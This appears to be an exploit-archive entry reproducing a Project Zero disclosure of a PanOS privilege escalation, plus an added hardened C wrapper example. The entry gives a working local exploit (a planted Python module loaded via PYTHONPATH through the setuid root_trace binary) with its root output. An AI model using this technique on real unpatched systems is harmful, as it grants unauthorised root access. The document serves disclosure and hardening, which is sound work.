zdt | Google Security Research | 1337DAY-ID-26360
History: Nov 19, 2016 - 12:00 a.m.

Palo Alto Networks PanOS root_trace - Privilege Escalation Vulnerability

2016-11-19 00:00:00
Google Security Research
0day.today
EPSS: 0.001 (Low), percentile 26.2%

Exploit for linux platform in category local exploits

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
 
The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a Python script:
 
$ ls -l /usr/local/bin/root_trace 
-rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace
 
As the environment is not scrubbed, you can just do something like this:
 
$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);
 
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
 
This was fixed by PAN:
 
http://securityadvisories.paloaltonetworks.com/Home/Detail/67
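
A hardened form of the wrapper pattern described above, as an added example (not PAN's fix and not code from the report): it builds the child's environment from an allow-list and calls execve() directly instead of system(). SAFE_PATH, the ALLOW list, ENV_CAP and build_env() are assumptions made for illustration.

```c
/* Added example: hardened setuid wrapper pattern (hypothetical, not PAN's code). */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define TARGET    "/usr/local/bin/masterd"              /* path from the report */
#define SAFE_PATH "PATH=/usr/sbin:/usr/bin:/sbin:/bin"  /* assumed fixed PATH */
#define ENV_CAP   8

/* Variables copied from the caller; everything else is dropped. (Assumed list.) */
static const char *const ALLOW[] = { "TERM", NULL };

/* Build the child's environment: a fixed PATH plus allow-listed entries
 * of src. PYTHONPATH, LD_PRELOAD and the caller's PATH never pass.
 * Returns the number of entries written (dst is NULL-terminated). */
size_t build_env(char *const src[], char *dst[], size_t cap)
{
    size_t out = 0;
    if (cap < 2) { if (cap) dst[0] = NULL; return 0; }
    dst[out++] = (char *)SAFE_PATH;
    for (; *src && out + 1 < cap; src++)
        for (const char *const *a = ALLOW; *a; a++) {
            size_t n = strlen(*a);
            /* Match "NAME=" exactly so TERMCAP does not ride in on TERM. */
            if (strncmp(*src, *a, n) == 0 && (*src)[n] == '=') {
                dst[out++] = *src;
                break;
            }
        }
    dst[out] = NULL;
    return out;
}

extern char **environ;

int main(void)
{
    char *envp[ENV_CAP];
    char *const argv[] = { (char *)TARGET, NULL };

    build_env(environ, envp, ENV_CAP);
    if (setuid(0) != 0) { perror("setuid"); return 1; }
    execve(TARGET, argv, envp);   /* no shell, explicit environment */
    perror("execve");
    return 127;
}
```

Because masterd is a Python script, starting the interpreter with -E, which makes it ignore PYTHON* variables, adds a second layer on top of the scrubbed environment.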

#  0day.today [2018-02-19]  #
